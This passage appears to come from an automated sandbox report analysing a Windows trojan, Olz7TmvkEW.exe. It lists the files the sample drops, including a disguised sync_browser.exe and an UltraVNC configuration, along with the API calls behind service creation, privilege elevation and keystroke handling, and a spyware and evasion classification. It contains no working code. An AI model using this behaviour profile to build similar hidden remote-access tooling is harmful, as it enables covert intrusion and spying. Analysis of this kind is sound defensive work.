                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,26_2_00007FF7D59474C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5942E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,21_2_00007FF7D5942E40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593D560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle,21_2_00007FF7D593D560
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,21_2_00007FF7D5943550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,21_2_00007FF7D59434B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,26_2_00007FF7D5943550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,26_2_00007FF7D59434B0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\CEpr8q.li7XUgJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\gTFLK1.jBd3EiJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004057210_2_00405721
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004139D10_2_004139D1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413AAB0_2_00413AAB
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004133700_2_00413370
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413D430_2_00413D43
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040AD300_2_0040AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59536D021_2_00007FF7D59536D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595265021_2_00007FF7D5952650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D598065021_2_00007FF7D5980650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5963E2021_2_00007FF7D5963E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595162021_2_00007FF7D5951620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5934E8021_2_00007FF7D5934E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F068C21_2_00007FF7D59F068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D596166021_2_00007FF7D5961660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595AE7021_2_00007FF7D595AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5931DD021_2_00007FF7D5931DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956DD121_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594C5B021_2_00007FF7D594C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5948E1021_2_00007FF7D5948E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594E61021_2_00007FF7D594E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594AD3021_2_00007FF7D594AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5954D7E21_2_00007FF7D5954D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594859021_2_00007FF7D5948590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594C8D021_2_00007FF7D594C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59470B021_2_00007FF7D59470B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594110021_2_00007FF7D5941100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593A91021_2_00007FF7D593A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59420E021_2_00007FF7D59420E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593188021_2_00007FF7D5931880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594A89021_2_00007FF7D594A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594C09021_2_00007FF7D594C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595A87021_2_00007FF7D595A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593C81021_2_00007FF7D593C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594974021_2_00007FF7D5949740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59EDF8021_2_00007FF7D59EDF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595E78021_2_00007FF7D595E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594AF6021_2_00007FF7D594AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593377021_2_00007FF7D5933770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59A12C021_2_00007FF7D59A12C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595C2C021_2_00007FF7D595C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937ACF21_2_00007FF7D5937ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937A9A21_2_00007FF7D5937A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937B0421_2_00007FF7D5937B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595AB1021_2_00007FF7D595AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595623E21_2_00007FF7D595623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59E725021_2_00007FF7D59E7250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937A1C21_2_00007FF7D5937A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5955A3321_2_00007FF7D5955A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5933A9021_2_00007FF7D5933A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937A5B21_2_00007FF7D5937A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594027021_2_00007FF7D5940270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593227021_2_00007FF7D5932270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5958A7021_2_00007FF7D5958A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59551B721_2_00007FF7D59551B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593E1D021_2_00007FF7D593E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59381AD21_2_00007FF7D59381AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593420021_2_00007FF7D5934200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59379E921_2_00007FF7D59379E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F09F021_2_00007FF7D59F09F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595D15021_2_00007FF7D595D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594693021_2_00007FF7D5946930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594A13021_2_00007FF7D594A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595F98021_2_00007FF7D595F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594898021_2_00007FF7D5948980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593517021_2_00007FF7D5935170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5952CC021_2_00007FF7D5952CC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59654A021_2_00007FF7D59654A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5965CA021_2_00007FF7D5965CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5941D1021_2_00007FF7D5941D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5961CE021_2_00007FF7D5961CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593DCF021_2_00007FF7D593DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595DCF021_2_00007FF7D595DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595A42021_2_00007FF7D595A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F8C9021_2_00007FF7D59F8C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D596346021_2_00007FF7D5963460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F2C7021_2_00007FF7D59F2C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956BBD21_2_00007FF7D5956BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594B3D021_2_00007FF7D594B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595739B21_2_00007FF7D595739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937BA621_2_00007FF7D5937BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59EE40021_2_00007FF7D59EE400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5944C1021_2_00007FF7D5944C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937BE221_2_00007FF7D5937BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59493E021_2_00007FF7D59493E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937B3721_2_00007FF7D5937B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D596033021_2_00007FF7D5960330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D594BB8021_2_00007FF7D594BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5947B9021_2_00007FF7D5947B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593439021_2_00007FF7D5934390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5937B7121_2_00007FF7D5937B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59536D026_2_00007FF7D59536D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595265026_2_00007FF7D5952650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D598065026_2_00007FF7D5980650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5963E2026_2_00007FF7D5963E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595162026_2_00007FF7D5951620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5934E8026_2_00007FF7D5934E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59F068C26_2_00007FF7D59F068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D596166026_2_00007FF7D5961660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595AE7026_2_00007FF7D595AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5931DD026_2_00007FF7D5931DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5956DD126_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594C5B026_2_00007FF7D594C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5948E1026_2_00007FF7D5948E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594E61026_2_00007FF7D594E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5952DF326_2_00007FF7D5952DF3
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594AD3026_2_00007FF7D594AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5954D7E26_2_00007FF7D5954D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594859026_2_00007FF7D5948590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594C8D026_2_00007FF7D594C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59470B026_2_00007FF7D59470B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594110026_2_00007FF7D5941100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593A91026_2_00007FF7D593A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59420E026_2_00007FF7D59420E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593188026_2_00007FF7D5931880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594A89026_2_00007FF7D594A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594C09026_2_00007FF7D594C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595A87026_2_00007FF7D595A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593C81026_2_00007FF7D593C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594974026_2_00007FF7D5949740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59EDF8026_2_00007FF7D59EDF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595E78026_2_00007FF7D595E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594AF6026_2_00007FF7D594AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593377026_2_00007FF7D5933770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59A12C026_2_00007FF7D59A12C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595C2C026_2_00007FF7D595C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937ACF26_2_00007FF7D5937ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937A9A26_2_00007FF7D5937A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937B0426_2_00007FF7D5937B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595AB1026_2_00007FF7D595AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595623E26_2_00007FF7D595623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59E725026_2_00007FF7D59E7250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937A1C26_2_00007FF7D5937A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5955A3326_2_00007FF7D5955A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5933A9026_2_00007FF7D5933A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937A5B26_2_00007FF7D5937A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594027026_2_00007FF7D5940270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593227026_2_00007FF7D5932270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5958A7026_2_00007FF7D5958A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59551B726_2_00007FF7D59551B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593E1D026_2_00007FF7D593E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59381AD26_2_00007FF7D59381AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593420026_2_00007FF7D5934200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59379E926_2_00007FF7D59379E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59F09F026_2_00007FF7D59F09F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595D15026_2_00007FF7D595D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594693026_2_00007FF7D5946930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594A13026_2_00007FF7D594A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595F98026_2_00007FF7D595F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594898026_2_00007FF7D5948980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593517026_2_00007FF7D5935170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59654A026_2_00007FF7D59654A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5965CA026_2_00007FF7D5965CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5941D1026_2_00007FF7D5941D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5961CE026_2_00007FF7D5961CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593DCF026_2_00007FF7D593DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595DCF026_2_00007FF7D595DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595A42026_2_00007FF7D595A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59F8C9026_2_00007FF7D59F8C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D596346026_2_00007FF7D5963460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59F2C7026_2_00007FF7D59F2C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5956BBD26_2_00007FF7D5956BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594B3D026_2_00007FF7D594B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595739B26_2_00007FF7D595739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937BA626_2_00007FF7D5937BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59EE40026_2_00007FF7D59EE400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5944C1026_2_00007FF7D5944C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937BE226_2_00007FF7D5937BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59493E026_2_00007FF7D59493E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937B3726_2_00007FF7D5937B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D596033026_2_00007FF7D5960330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D594BB8026_2_00007FF7D594BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5947B9026_2_00007FF7D5947B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593439026_2_00007FF7D5934390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5937B7126_2_00007FF7D5937B71
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: String function: 004026B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D59E7C50 appears 60 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D59E9500 appears 42 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D5933730 appears 730 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D59E70B4 appears 56 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D599A3B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7D593AE30 appears 34 times
                          Source: GIjul8.QTIrrr.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.3.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.3.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.7.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.7.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: Olz7TmvkEW.exe, 00000000.00000000.2170705266.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exeBinary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: sdABZ4.E1924R.0.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                          Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@50/46@2/1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,21_2_00007FF7D5943550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,21_2_00007FF7D59418A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,21_2_00007FF7D59434B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,26_2_00007FF7D5943550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,26_2_00007FF7D59418A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,26_2_00007FF7D59434B0
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,21_2_00007FF7D5942D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_00007FF7D5942D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5999BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,21_2_00007FF7D5999BC0
